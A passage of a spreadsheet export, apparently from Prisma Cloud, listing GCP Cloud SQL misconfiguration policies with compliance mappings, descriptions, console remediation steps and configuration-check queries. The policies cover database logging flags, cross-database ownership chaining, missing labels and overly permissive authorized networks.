Authority Of India, kfirdaus AWS Account-CS, CRI Profile v2.0, APRA (CPS 234) Information Security, CIS v1.1.0 (GCP), ISO/IEC 27002:2013, SOC 2, NIST CSF v2.0, APRA (CPS 234) Information Security, NIST CSF, CDC NIST 800-53 Rev4, Copy of ACSC Information Security Manual (ISM)-clone, Secure Controls Framework (SCF) - 2022.2.1, PCI DSS v4.0, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, FFIEC, PCI DSS v4.0, NIST SP 800-171 Revision 3, ISO/IEC 27002:2013, CIS Controls v8.1, CSA CCM v4.0.12, DORA, ACSC Information Security Manual (ISM), Copy of CIS Controls v8, PCI DSS v3.2.1, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST SP 800-172, NIST 800-53 Rev4, Copy of ACSC Information Security Manual (ISM)-clone</t>
        </is>
      </c>
      <c r="B2967" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2967" s="2" t="inlineStr"/>
      <c r="D2967" t="inlineStr"/>
      <c r="E2967" t="inlineStr"/>
      <c r="F2967" t="inlineStr"/>
      <c r="G2967" t="b">
        <v>1</v>
      </c>
      <c r="H29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7" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2967" t="inlineStr">
        <is>
          <t>gcloud-sql</t>
        </is>
      </c>
      <c r="K2967" t="inlineStr">
        <is>
          <t>GCP PostgreSQL instance with log_checkpoints database flag is disabled</t>
        </is>
      </c>
      <c r="L2967" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2967" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2967" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2967" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2967" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2967" t="inlineStr">
        <is>
          <t>Guidelines for Database Systems</t>
        </is>
      </c>
      <c r="R2967" t="inlineStr">
        <is>
          <t>ISM-1537</t>
        </is>
      </c>
      <c r="S2967" t="inlineStr"/>
      <c r="T2967" t="b">
        <v>0</v>
      </c>
      <c r="U2967" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2967" t="inlineStr">
        <is>
          <t>gcloud-sql-instances-list</t>
        </is>
      </c>
      <c r="W2967" t="inlineStr">
        <is>
          <t>This policy identifies PostgreSQL instances in which log_checkpoints database flag is not set. Enabling the log_checkpoints database flag would enable logging of checkpoints and restart points to the server log.</t>
        </is>
      </c>
      <c r="X2967" t="inlineStr">
        <is>
          <t>1. Login to GCP Console
2. Navigate to SQL
3. Select the PostgreSQL instance for which you want to enable the database flag from the list
4. Click 'Edit'
NOTE: If the instance is stopped, You need to START instance first to edit the configurations, then Click on EDIT.
5. Go to the 'Flags' section under 'Configuration options'
6. Click 'Add item', choose the flag 'log_checkpoints' from the drop-down menu and set the value to 'on'
OR
If 'log_checkpoints' database flag is already set to 'off', from the drop-down menu set the value to 'on'
7. Click on 'Save' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-2
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-2</t>
        </is>
      </c>
      <c r="Y2967" t="inlineStr"/>
      <c r="Z2967" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-sql-instances-list' AND json.rule = "databaseVersion contains POSTGRES and (settings.databaseFlags[?(@.name=='log_checkpoints')] does not exist or settings.databaseFlags[?(@.name=='log_checkpoints')].value equals off)"
{"category":"General","resourceTypes":["google_sql_database_instance"]}</t>
        </is>
      </c>
      <c r="AA2967" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2967" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2967" t="inlineStr">
        <is>
          <t>PC-GCP-SQL-532-CKV_GCP_51</t>
        </is>
      </c>
      <c r="AD2967" t="b">
        <v>1</v>
      </c>
      <c r="AE2967" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2967" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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7" t="inlineStr">
        <is>
          <t>6058e452-648f-44d3-a6c0-4e3616f11210</t>
        </is>
      </c>
      <c r="AI2967" t="inlineStr">
        <is>
          <t>56f48aa7-73c7-4b85-bb71-2b4d063864d5</t>
        </is>
      </c>
      <c r="AJ2967" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2967" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2968">
      <c r="A2968" t="inlineStr">
        <is>
          <t>TX-RAMP Level 2, ISO/IEC 27001:2022, NIST 800-53 Rev 5, NIST 800-53 Rev 5, HITRUST CSF v.11.2.0, CIS v2.0.0 (GCP) Level 1, CIS v3.0.0 (GCP) Level 1, SOC 2, Secure Controls Framework (SCF) - 2024.2, DORA</t>
        </is>
      </c>
      <c r="B2968" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2968" s="2" t="inlineStr"/>
      <c r="D2968" t="inlineStr"/>
      <c r="E2968" t="inlineStr"/>
      <c r="F2968" t="inlineStr"/>
      <c r="G2968" t="b">
        <v>1</v>
      </c>
      <c r="H29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8" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2968" t="inlineStr">
        <is>
          <t>gcloud-sql</t>
        </is>
      </c>
      <c r="K2968" t="inlineStr">
        <is>
          <t>GCP PostgreSQL instance database flag cloudsql.enable_pgaudit is not set to on</t>
        </is>
      </c>
      <c r="L2968" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2968" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2968" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2968" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2968" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2968" t="inlineStr">
        <is>
          <t>Chapter II</t>
        </is>
      </c>
      <c r="R2968" t="inlineStr">
        <is>
          <t>Article 10, Detection</t>
        </is>
      </c>
      <c r="S2968" t="inlineStr"/>
      <c r="T2968" t="b">
        <v>0</v>
      </c>
      <c r="U2968" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2968" t="inlineStr">
        <is>
          <t>gcloud-sql-instances-list</t>
        </is>
      </c>
      <c r="W2968" t="inlineStr">
        <is>
          <t>This policy identifies PostgreSQL database instances in which database flag cloudsql.enable_pgaudit is not set to on. Enabling the flag cloudsql.enable_pgaudit enables the logging by pgAudit extenstion for the database (if installed). The pgAudit extenstion for PostgreSQL databases provides detailed session and object logging to comply with government, financial, &amp; ISO standards and provides auditing capabilities to mitigate threats by monitoring security events on the instance. Any changes to the database logging configuration should be made in accordance with the organization's logging policy.</t>
        </is>
      </c>
      <c r="X2968" t="inlineStr">
        <is>
          <t>It is recommended to set the 'cloudsql.enable_pgaudit' flag to 'on' for PostgreSQL database.
To update the flag of GCP PostgreSQL instance, please refer to the URL given below and set cloudsql.enable_pgaudit flag to on:
https://cloud.google.com/sql/docs/postgres/flags#set_a_database_flag</t>
        </is>
      </c>
      <c r="Y2968" t="inlineStr"/>
      <c r="Z2968" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-sql-instances-list' AND json.rule = "databaseVersion contains POSTGRES and (settings.databaseFlags[?(@.name=='cloudsql.enable_pgaudit')] does not exist or settings.databaseFlags[?(@.name=='cloudsql.enable_pgaudit')].value does not equal on)"</t>
        </is>
      </c>
      <c r="AA2968" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2968" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2968" t="inlineStr">
        <is>
          <t>PC-GCP-SQL-1099</t>
        </is>
      </c>
      <c r="AD2968" t="b">
        <v>1</v>
      </c>
      <c r="AE2968" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2968" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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8" t="inlineStr">
        <is>
          <t>a94e6dd4-2bc9-4579-89a6-a450dbf989d3</t>
        </is>
      </c>
      <c r="AI2968" t="inlineStr">
        <is>
          <t>cea1610a-c70f-4e0c-ae38-9ec36b82f12f</t>
        </is>
      </c>
      <c r="AJ2968" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2968" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2969">
      <c r="A2969" t="inlineStr">
        <is>
          <t>ISO/IEC 27002:2013, Brazilian Data Protection Law (LGPD), ISO/IEC 27001:2022, Rehan, APRA (CPS 234) Information Security, ISO/IEC 27017:2015, RBI Baseline Cyber Security and Resilience Requirements, Risk Management in Technology (RMiT), Secure Controls Framework (SCF) - 2024.2, CIS Controls v8.1, ISO 27002:2022, kfirdaus AWS Account-CS, ISO/IEC 27002:2013, ITSG-33, Copy of ACSC Information Security Manual (ISM)-clone, CSA CCM v.4.0.1, CIS v1.2.0 (GCP), APRA (CPS 234) Information Security, ISO/IEC 27001:2022, ISO/IEC 27017:2015, ISO 27002:2022, PCI DSS v3.2.1, CSA CCM v.4.0.1, ISO/IEC 27017:2015, ISO 27002:2022, kashan ACSC Information Security Manual (ISM), CIS v1.3.0 (GCP), ACSC Information Security Manual (ISM), HITRUST v.9.4.2 [Deprecated], TX-RAMP Level 1, NIST SP 800-171 Revision 2, TX-RAMP Level 2, PCI DSS v4.0, HITRUST v.9.4.2 [Deprecated], kashan ACSC Information Security Manual (ISM), CIS v3.0.0 (GCP) Level 1, CIS Controls v8, Brazilian Data Protection Law (LGPD), CSA CCM v.4.0.1, CIS v2.0.0 (GCP) Level 1, CSA CCM v.4.0.1, ISO/IEC 27001:2022, Risk Management in Technology (RMiT), Insurance Regulatory And Development Authority Of India, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, CIS Controls v7.1, NIST CSF, Copy of ACSC Information Security Manual (ISM)-clone, Secure Controls Framework (SCF) - 2022.2.1, ISO 27002:2022, Copy of CIS Controls v8, CIS v1.1.0 (GCP), ISO/IEC 27002:2013, ACSC Information Security Manual (ISM), PCI DSS v3.2.1, Sarbanes Oxley Act (SOX), ISO/IEC 27001:2022, kfirdaus AWS Account-CS, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST SP 800-172</t>
        </is>
      </c>
      <c r="B2969" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2969" s="2" t="inlineStr"/>
      <c r="D2969" t="inlineStr"/>
      <c r="E2969" t="inlineStr"/>
      <c r="F2969" t="inlineStr"/>
      <c r="G2969" t="b">
        <v>1</v>
      </c>
      <c r="H29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69" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2969" t="inlineStr">
        <is>
          <t>gcloud-sql</t>
        </is>
      </c>
      <c r="K2969" t="inlineStr">
        <is>
          <t>GCP SQL Server instance database flag 'cross db ownership chaining' is enabled</t>
        </is>
      </c>
      <c r="L2969" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2969" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2969" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2969" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2969" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2969" t="inlineStr">
        <is>
          <t>Guidelines for Database Systems</t>
        </is>
      </c>
      <c r="R2969" t="inlineStr">
        <is>
          <t>ISM-1261</t>
        </is>
      </c>
      <c r="S2969" t="inlineStr"/>
      <c r="T2969" t="b">
        <v>0</v>
      </c>
      <c r="U2969" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2969" t="inlineStr">
        <is>
          <t>gcloud-sql-instances-list</t>
        </is>
      </c>
      <c r="W2969" t="inlineStr">
        <is>
          <t>This policy identifies GCP SQL Server instance database flag 'cross db ownership chaining' is enabled. Enabling cross db ownership is not recommended unless all of the databases hosted by the instance of SQL Server must participate in cross-database ownership chaining and you are aware of the security implications of this setting.</t>
        </is>
      </c>
      <c r="X2969" t="inlineStr">
        <is>
          <t>1. Login to GCP Console
2. Navigate to SQL
3. Click on the SQL Server instance for which you want to disable the database flag from the list
4. Click 'Edit'
5. Go to  'Flags and Parameters'  under 'Configuration options' section
6. Search for the flag 'cross db ownership chaining' and set the value 'off'
7. Click on 'Save' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-9
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/cloud-sql-policies/bc-gcp-sql-9</t>
        </is>
      </c>
      <c r="Y2969" t="inlineStr"/>
      <c r="Z2969" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-sql-instances-list' AND json.rule = "databaseVersion contains SQLSERVER and settings.databaseFlags[?(@.name=='cross db ownership chaining')].value equals on"
{"category":"General","resourceTypes":["google_sql_database_instance"]}</t>
        </is>
      </c>
      <c r="AA2969" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2969" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2969" t="inlineStr">
        <is>
          <t>PC-GCP-SQL-537-CKV_GCP_58</t>
        </is>
      </c>
      <c r="AD2969" t="b">
        <v>1</v>
      </c>
      <c r="AE2969" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2969" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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69" t="inlineStr">
        <is>
          <t>fc6634c3-7ab9-4a84-a447-09499b1e418c</t>
        </is>
      </c>
      <c r="AI2969" t="inlineStr">
        <is>
          <t>1f618d6e-42c5-4861-b7bb-6636a597aeac</t>
        </is>
      </c>
      <c r="AJ2969" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2969" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2970">
      <c r="A2970" t="inlineStr">
        <is>
          <t>ITSG-33, CIS v2.0.0 (GCP) Level 1, GDPR, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, ISO/IEC 27001:2022, TX-RAMP Level 1, TX-RAMP Level 2, CIS Controls v8.1, Insurance Regulatory And Development Authority Of India, SOC 2, CSA CCM v4.0.12, DORA</t>
        </is>
      </c>
      <c r="B2970" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2970" s="2" t="inlineStr"/>
      <c r="D2970" t="inlineStr"/>
      <c r="E2970" t="inlineStr"/>
      <c r="F2970" t="inlineStr"/>
      <c r="G2970" t="b">
        <v>1</v>
      </c>
      <c r="H29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0" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2970" t="inlineStr">
        <is>
          <t>gcloud-sql</t>
        </is>
      </c>
      <c r="K2970" t="inlineStr">
        <is>
          <t>GCP PostgreSQL instance database flag log_min_error_statement is not set</t>
        </is>
      </c>
      <c r="L2970" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2970" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2970" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2970" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2970" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2970" t="inlineStr">
        <is>
          <t>Chapter II</t>
        </is>
      </c>
      <c r="R2970" t="inlineStr">
        <is>
          <t>Article 10, Detection</t>
        </is>
      </c>
      <c r="S2970" t="inlineStr"/>
      <c r="T2970" t="b">
        <v>0</v>
      </c>
      <c r="U2970" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2970" t="inlineStr">
        <is>
          <t>gcloud-sql-instances-list</t>
        </is>
      </c>
      <c r="W2970" t="inlineStr">
        <is>
          <t>This policy identifies PostgreSQL database instances in which database flag log_min_error_statement is not set. The log_min_error_statement flag defines the minimum message severity level that are considered as an error statement. Messages for error statements are logged with the SQL statement. Valid values include DEBUG5, DEBUG4, DEBUG3, DEBUG2, DEBUG1, INFO, NOTICE, WARNING, ERROR, LOG, FATAL, and PANIC. Each severity level includes the subsequent levels. log_min_error_statement flag value changes should only be made in accordance with the organization's logging policy. Proper auditing can help in troubleshooting operational problems and also permits forensic analysis.</t>
        </is>
      </c>
      <c r="X2970" t="inlineStr">
        <is>
          <t>It is recommended to set the 'log_min_error_statement' flag for PostgreSQL database as per your organization's logging policy.
To update the databse flag of GCP PostgreSQL instance, please refer to the URL given below and set log_min_error_statement flag as needed:
https://cloud.google.com/sql/docs/postgres/flags#set_a_database_flag</t>
        </is>
      </c>
      <c r="Y2970" t="inlineStr"/>
      <c r="Z2970" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-sql-instances-list' AND json.rule = "databaseVersion contains POSTGRES and settings.databaseFlags[?(@.name=='log_min_error_statement')] does not exist"</t>
        </is>
      </c>
      <c r="AA2970" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2970" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2970" t="inlineStr">
        <is>
          <t>PC-GCP-SQL-1098</t>
        </is>
      </c>
      <c r="AD2970" t="b">
        <v>1</v>
      </c>
      <c r="AE2970" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2970" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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0" t="inlineStr">
        <is>
          <t>353f4707-92ce-4094-86b5-e500689faf3c</t>
        </is>
      </c>
      <c r="AI2970" t="inlineStr">
        <is>
          <t>149663f5-15d9-4445-93f4-6534e2720bc1</t>
        </is>
      </c>
      <c r="AJ2970" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2970" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2971">
      <c r="A2971" t="inlineStr">
        <is>
          <t>CSA CCM v3.0.1, ISO/IEC 27017:2015, APRA (CPS 234) Information Security, CSA CCM v3.0.1, FFIEC, Secure Controls Framework (SCF) - 2024.2, kfirdaus AWS Account-CS, NIST SP 800-172, ISO/IEC 27017:2015, CSA CCM v.4.0.1, CSA CCM v3.0.1, APRA (CPS 234) Information Security, CSA CCM v3.0.1, FFIEC, CDC NIST 800-53 Rev4, NIST 800-53 Rev 5, ISO/IEC 27017:2015, RBI Baseline Cyber Security and Resilience Requirements, ISO/IEC 27017:2015, Copy of CIS Controls v8, kashan ACSC Information Security Manual (ISM), CSA CCM v3.0.1, New Zealand Information Security Manual (NZISM v3.4), CIS Controls v8, FFIEC, NIST 800-53 Rev4, NIST CSF, ISO/IEC 27017:2015, PCI DSS v3.2.1, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, ISO/IEC 27001:2022, NIST 800-53 Rev4, CSA CCM v.4.0.1, ISO/IEC 27002:2013, ISO/IEC 27002:2013, ISO/IEC 27017:2015, CSA CCM v.4.0.1, ISO/IEC 27002:2013, CSA CCM v.4.0.1, ISO/IEC 27002:2013, APRA (CPS 234) Information Security, CDC NIST 800-53 Rev4, CSA CCM v3.0.1, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Copy of ACSC Information Security Manual (ISM)-clone, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v3.0.1, CIS Controls v8.1, ISO/IEC 27002:2013, NIST 800-53 Rev 5, Brazilian Data Protection Law (LGPD), ACSC Information Security Manual (ISM), Cybersecurity Maturity Model Certification (CMMC) v.1.02, Sarbanes Oxley Act (SOX), NIST SP 800-171 Revision 2, CIS Controls v7.1, NIST SP 800-172, CSA CCM v3.0.1, CSA CCM v.4.0.1, CSA CCM v3.0.1, CSA CCM v.4.0.1, Copy of New Zealand Information Security Manual (NZISM v3.4), ISO/IEC 27018:2019</t>
        </is>
      </c>
      <c r="B2971" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2971" s="2" t="inlineStr"/>
      <c r="D2971" t="inlineStr"/>
      <c r="E2971" t="inlineStr"/>
      <c r="F2971" t="inlineStr"/>
      <c r="G2971" t="b">
        <v>1</v>
      </c>
      <c r="H29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1" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2971" t="inlineStr">
        <is>
          <t>gcloud-sql</t>
        </is>
      </c>
      <c r="K2971" t="inlineStr">
        <is>
          <t>GCP SQL Instances without any Label information</t>
        </is>
      </c>
      <c r="L2971" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2971" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2971" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2971" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2971" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2971" t="inlineStr">
        <is>
          <t>10</t>
        </is>
      </c>
      <c r="R2971" t="inlineStr">
        <is>
          <t>10.8</t>
        </is>
      </c>
      <c r="S2971" t="inlineStr">
        <is>
          <t>GCP</t>
        </is>
      </c>
      <c r="T2971" t="b">
        <v>0</v>
      </c>
      <c r="U2971" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2971" t="inlineStr">
        <is>
          <t>gcloud-sql-instances-list</t>
        </is>
      </c>
      <c r="W2971" t="inlineStr">
        <is>
          <t>This policy identifies the SQL DB instance which does not have any Labels. Labels can be used for easy identification and searches.</t>
        </is>
      </c>
      <c r="X2971" t="inlineStr">
        <is>
          <t>1. Login to GCP Console.
2. On left Navigation, Click on SQL
3. Select the reported SQL instance.
4. Click on EDIT, Add labels with the appropriate Key:Value information.
5. Click Save</t>
        </is>
      </c>
      <c r="Y2971" t="inlineStr"/>
      <c r="Z2971" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name='gcloud-sql-instances-list' and json.rule = 'settings.userLabels[*] does not exist'</t>
        </is>
      </c>
      <c r="AA2971" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2971" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2971" t="inlineStr">
        <is>
          <t>PC-GCP-SQL-82</t>
        </is>
      </c>
      <c r="AD2971" t="b">
        <v>1</v>
      </c>
      <c r="AE2971" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2971" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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1" t="inlineStr">
        <is>
          <t>6046a285-ae97-4e07-a63f-11227148f6ba</t>
        </is>
      </c>
      <c r="AI2971" t="inlineStr">
        <is>
          <t>9095e24f-c0ac-4bc1-ad04-5a9273c644a2</t>
        </is>
      </c>
      <c r="AJ2971" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2971" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2972">
      <c r="A2972" t="inlineStr">
        <is>
          <t>ISO 27001:2013, ISO/IEC 27001:2022, ISO 27001:2013, APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.1.02, HIPAA, NIST CSF v2.0, jbrox - GDPR, NIST CSF, RBI Baseline Cyber Security and Resilience Requirements, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, ISO 27002:2022, Risk Management in Technology (RMiT), NIST CSF, CDC NIST 800-53 Rev4, CIS v3.0.0 (GCP) Level 1, GDPR, APRA (CPS 234) Information Security, ISO/IEC 27001:2022, ISO 27002:2022, NIST 800-53 Rev 5, GDPR, NIST CSF, CIS v1.3.0 (GCP), ISO 27002:2022, ISO 27001:2013, NIST 800-53 Rev 5, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ISO 27001:2013, Secure Controls Framework (SCF) - 2022.2.1, NIST 800-53 Rev4, HIPAA, SOC 2, ITSG-33, TX-RAMP Level 2, ACSC Information Security Manual (ISM), PCI DSS v4.0, PCI DSS v3.2.1, NIST 800-53 Rev 5, Insurance Regulatory And Development Authority Of India, SOC 2, ISO 27001:2013, Brazilian Data Protection Law (LGPD), Insurance Regulatory And Development Authority Of India, Sarbanes Oxley Act (SOX), NIST CSF, Secure Controls Framework (SCF) - 2024.2, Sarbanes Oxley Act (SOX), NIST CSF, CIS v2.0.0 (GCP) Level 1, PCI DSS v4.0, NIST CSF, TX-RAMP Level 2, CIS Controls v8, CDC NIST 800-53 Rev4, NIST CSF, SOC 2, jbrox - GDPR, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), jbrox - GDPR, PCI DSS v4.0, SOC 2, ISO/IEC 27001:2022, CIS v1.2.0 (GCP), Rehan, Copy of ACSC Information Security Manual (ISM)-clone, Secure Controls Framework (SCF) - 2024.2, PCI DSS v4.0, APRA (CPS 234) Information Security, ITSG-33, CSA CCM v3.0.1, NIST CSF v2.0, TX-RAMP Level 1, PIPEDA, PCI DSS v4.0, GDPR, ISO 27002:2022, Copy of CIS Controls v8, NIST SP 800-172, kashan ACSC Information Security Manual (ISM), kfirdaus AWS Account-CS, SOC 2, CIS v1.0.0 (GCP), NIST 800-53 Rev4, ISO 27001:2013, PCI DSS v4.0, CCPA 2018, CIS v1.1.0 (GCP), NIST CSF, CIS Controls v7.1, ISO/IEC 27001:2022, PCI DSS v4.0, Australian Energy Sector Cyber Security Framework (AESCSF), NIST SP 800-171 Revision 2</t>
        </is>
      </c>
      <c r="B2972" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2972" s="2" t="inlineStr"/>
      <c r="D2972" t="inlineStr"/>
      <c r="E2972" t="inlineStr"/>
      <c r="F2972" t="inlineStr"/>
      <c r="G2972" t="b">
        <v>1</v>
      </c>
      <c r="H29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2" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2972" t="inlineStr">
        <is>
          <t>gcloud-sql</t>
        </is>
      </c>
      <c r="K2972" t="inlineStr">
        <is>
          <t>GCP SQL instance configured with overly permissive authorized networks</t>
        </is>
      </c>
      <c r="L2972" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2972" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2972" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2972" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2972" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2972" t="inlineStr">
        <is>
          <t>Guidelines for Database Systems</t>
        </is>
      </c>
      <c r="R2972" t="inlineStr">
        <is>
          <t>ISM-1271</t>
        </is>
      </c>
      <c r="S2972" t="inlineStr">
        <is>
          <t>GCP</t>
        </is>
      </c>
      <c r="T2972" t="b">
        <v>0</v>
      </c>
      <c r="U2972" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2972" t="inlineStr">
        <is>
          <t>gcloud-sql-instances-list</t>
        </is>
      </c>
      <c r="W2972" t="inlineStr">
        <is>
          <t>This policy identifies GCP Cloud SQL instances that are configured with overly permissive authorized networks. You can connect to the SQL instance securely by using the Cloud SQL Proxy or adding your client's public address as an authorized network. If your client application is connecting directly to a Cloud SQL instance on its public IP address, you have to add your client's external address as an Authorized network for securing the connection. It is recommended to add specific IPs instead of public IPs as authorized networks as per the requirement.
Reference: https://cloud.google.com/sql/docs/mysql/authorize-networks</t>
        </is>
      </c>
      <c r="X2972" t="inlineStr">
        <is>
          <t>1. Login to GCP Portal
2. Navigate to the 'Instances' page on section 'SQL'(Left Panel)
3. Click on the alerted instance name 
4. Select the 'Connections' tab on the left panel
5. Inspect for the networks added as Authorized Networks
6. If any public IP is set for 'Authorized networks', review and delete the network by clicking the delete icon on the network
7. Click on 'DONE'.
8. Click on 'SAVE'.</t>
        </is>
      </c>
      <c r="Y2972" t="inlineStr"/>
      <c r="Z2972" t="inlineStr">
        <is>
